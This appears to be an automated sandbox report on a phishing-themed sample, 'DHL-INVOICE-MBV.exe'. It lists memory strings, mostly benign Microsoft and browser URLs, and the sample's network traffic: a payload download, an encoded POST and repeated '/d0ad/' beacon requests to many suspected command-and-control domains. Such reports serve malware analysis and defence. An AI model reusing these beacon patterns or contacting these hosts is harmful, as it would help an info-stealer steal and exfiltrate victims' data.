Source: explorer.exe, 0000000A.00000000.18485404948.000000000914F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18362003062.000000000914F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18232387000.000000000914F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.18255998138.000000000CE0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18503819716.000000000CE0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18441217767.000000000CE0E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.18255297358.000000000CDDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?i
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: https://api.oscar.aol.com/aim/startOSCARSession
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: https://api.oscar.aol.com/aim/startOSCARSessionhttps://api.icq.net/aim/startOSCARSession
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: https://api.screenname.aol.com/auth/clientLogin
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: https://api.screenname.aol.com/auth/clientLoginhttps://api.login.icq.net/auth/clientLogin
Source: explorer.exe, 0000000A.00000000.18425366760.000000000930F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18364872038.000000000930F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18236253447.000000000930F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18487988949.000000000930F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: WWAHost.exe, 00000005.00000003.18734956473.000000000922F000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: WWAHost.exe, 00000005.00000003.18734956473.000000000922F000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 0000000A.00000000.18257225462.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18381242780.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18504924350.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442076455.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000A.00000000.18257225462.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18381242780.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18504924350.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442076455.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: WWAHost.exe, 00000005.00000002.22579154224.0000000004B8C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Kanit:200
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17542927393.0000000002913000.00000004.00000800.00020000.00000000.sdmp, System.Runtime.Extensions.dll.1.dr	String found in binary or memory: https://github.com/dotnet/runtime
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=parked
Source: WWAHost.exe, 00000005.00000003.18734956473.000000000922F000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: WWAHost.exe, 00000005.00000003.18734956473.000000000922F000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: WWAHost.exe, 00000005.00000002.22566728135.00000000032DE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18666554198.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22567064507.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18665326000.00000000032FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: WWAHost.exe, 00000005.00000002.22566728135.00000000032DE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18666554198.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22567064507.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18665326000.00000000032FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: WWAHost.exe, 00000005.00000002.22566728135.00000000032DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: WWAHost.exe, 00000005.00000002.22566728135.00000000032DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/H
Source: WWAHost.exe, 00000005.00000002.22566728135.00000000032DE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18666554198.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22567064507.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18665326000.00000000032FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0
Source: explorer.exe, 0000000A.00000000.18257225462.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18381242780.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18504924350.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442076455.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com:Tue:Tn
Source: explorer.exe, 0000000A.00000000.18435878166.000000000C976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18375180058.000000000C976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18498559940.000000000C976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18249186722.000000000C976000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: WWAHost.exe, 00000005.00000002.22582900822.0000000008719000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000A.00000000.18511467479.0000000010519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18266261425.0000000010519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18386850230.0000000010519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18448148313.0000000010519000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/ClassId
Source: explorer.exe, 0000000A.00000000.18257225462.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18381242780.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18504924350.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442076455.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18485404948.000000000914F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18413231682.0000000002D2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18362003062.000000000914F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18232387000.000000000914F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18351743697.0000000002D2F000.00000004.00000001.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images
Source: WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/democratic-support-for-supreme-court-plummets-after-decision
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-sues-new-york-times-and-niece-mary-trump-over-tax-reco
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown

HTTP traffic detected: POST /d0ad/ HTTP/1.1Host: www.mnrinstitutes.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.mnrinstitutes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mnrinstitutes.com/d0ad/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 58 75 3d 75 68 68 39 36 75 64 7a 67 69 68 70 67 78 70 70 5a 77 6f 54 51 4c 4b 68 56 67 36 30 4e 67 54 7a 51 79 61 6b 4b 46 6c 73 53 66 50 38 4a 38 31 6b 66 4d 37 43 37 72 77 2d 4a 4c 49 47 30 67 53 65 38 34 50 53 75 63 4a 4e 78 32 42 78 73 5f 72 6e 41 4c 37 32 6e 44 69 51 73 46 36 75 69 76 35 45 63 53 4f 62 4f 79 63 4f 67 6c 4a 54 42 77 62 50 56 4a 70 53 4f 6e 42 62 44 4c 59 57 36 54 30 62 6e 53 38 37 79 73 4b 53 54 53 59 65 47 64 30 73 45 52 38 54 5a 56 38 73 59 71 28 54 57 76 79 43 38 4f 57 4a 49 38 6a 45 32 45 66 42 70 4d 49 5f 7e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=uhh96udzgihpgxppZwoTQLKhVg60NgTzQyakKFlsSfP8J81kfM7C7rw-JLIG0gSe84PSucJNx2Bxs_rnAL72nDiQsF6uiv5EcSObOycOglJTBwbPVJpSOnBbDLYW6T0bnS87ysKSTSYeGd0sER8TZV8sYq(TWvyC8OWJI8jE2EfBpMI_~w).

Source: unknown

DNS traffic detected: queries for: www.cccre8ive.com

Source: global traffic	HTTP traffic detected: GET /vSvUluerSYkJZ205.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.cccre8ive.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=EKBIswxubh+3rSi760MLmAr4JXvPRLtL3ozMDitkvV65RFIqiY835aWCQtue5THCT9fxMq7VmpQKPerXNr4JKGfkodcEQfh6sQ== HTTP/1.1Host: www.salemsilverpalace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=jjJd5e0DmTQo1TJERy8cZ6iwHgiAMW7tSAG3VG96MIrCLP8ueKug57ZRCpkKrz2d2a+jpP8qm1duoLHSN5X+t1/Y7kvplYFeFQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.mnrinstitutes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== HTTP/1.1Host: www.creotopi.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.yumfechy.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=qk6bCrLFrTYlUGO/t3PC0vhi1ruOe5X2O7zMPSUEOWKorI5W5CC9pmQXmGdpZs8IhG91pCpdUbpgHMoHKfMckx4RAwKNJXBJ8w== HTTP/1.1Host: www.sbgfoundation.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.budgaugh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=WgPRl/FvoZMBo2mlKPlxV15+dFE2DaQPOh4rMMuZqba7P4QkcwKBZ2znWxmeG8Vu0cfzpyTmzFPFRI6Qoo1H9rMyaIuGGCESsA== HTTP/1.1Host: www.bondiev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.rahaingoadvice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA== HTTP/1.1Host: www.altruista.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=zrLMOBLzw3r4M3Z/yuOODvZ2qFQg4fDKObavmOYF/mbdwyJReU8Eih7YSll5LHsPS7aScgEYlXeSWE+YT/OxrgX5e4N2j5d5AQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.guvnorsnyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=MT97c0J759A0sOsOXYgXf7Xc72zTUNBA1GaWpb3y0T3bjGcERslrwlwnjRFvocEHJT8Z6PNgwaS4sx6KFIijle8Vsk6Ju/84EQ== HTTP/1.1Host: www.pnpg.hairConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=pSoFcc1sljf5pE8BAUAKgRGInj4t6J/8ED+D7ZUBpkkz/bcIOpxSRb8xzFWwpHvVFx48hu31rpRymwEIqHbvimFaG2ZjSEosQg==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.migrationtask.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=CcRoIk99VuHdxqnbMe4fCWW8YB6+5lBHd7AattmFAjuGnedAqC5z1GiP1/3phXFikd8x5PSyWZu2r/HN2vGAs2KGSq5bV7fyPg== HTTP/1.1Host: www.driftreiki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=xi3nf1mTlPmwcTH1D3S90LFHOZMhXPM67udBVFKbn8eCFnECdFhGzG3NeZJo25lV+AnrsZF+e668tZdvE6JJ2Emm4ondeffVjQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.motorizedchess.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=HCnz+iAgXK+7K7+9dSYLCP83SywxThg19T0Ldayx2vBhnzv8BQwSj7Hjke2daycRt4H7k7Lpl/EZig9RgqQ7Vyy58aT11h8vxw== HTTP/1.1Host: www.donglinwangluo.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=UGTU82wtujibqQR8E2n422F7Zfw2d+xFnOfFMWTM8LMnetJ3NkFDX8bqmUj8VDzwoxc6QpBbYfZ2mv7LzdW/Xm9DjEFcRTi1ig==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.7o0i.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=EKBIswxubh+3rSi760MLmAr4JXvPRLtL3ozMDitkvV65RFIqiY835aWCQtue5THCT9fxMq7VmpQKPerXNr4JKGfkodcEQfh6sQ== HTTP/1.1Host: www.salemsilverpalace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=jjJd5e0DmTQo1TJERy8cZ6iwHgiAMW7tSAG3VG96MIrCLP8ueKug57ZRCpkKrz2d2a+jpP8qm1duoLHSN5X+t1/Y7kvplYFeFQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.mnrinstitutes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== HTTP/1.1Host: www.creotopi.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.yumfechy.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=qk6bCrLFrTYlUGO/t3PC0vhi1ruOe5X2O7zMPSUEOWKorI5W5CC9pmQXmGdpZs8IhG91pCpdUbpgHMoHKfMckx4RAwKNJXBJ8w== HTTP/1.1Host: www.sbgfoundation.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.budgaugh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
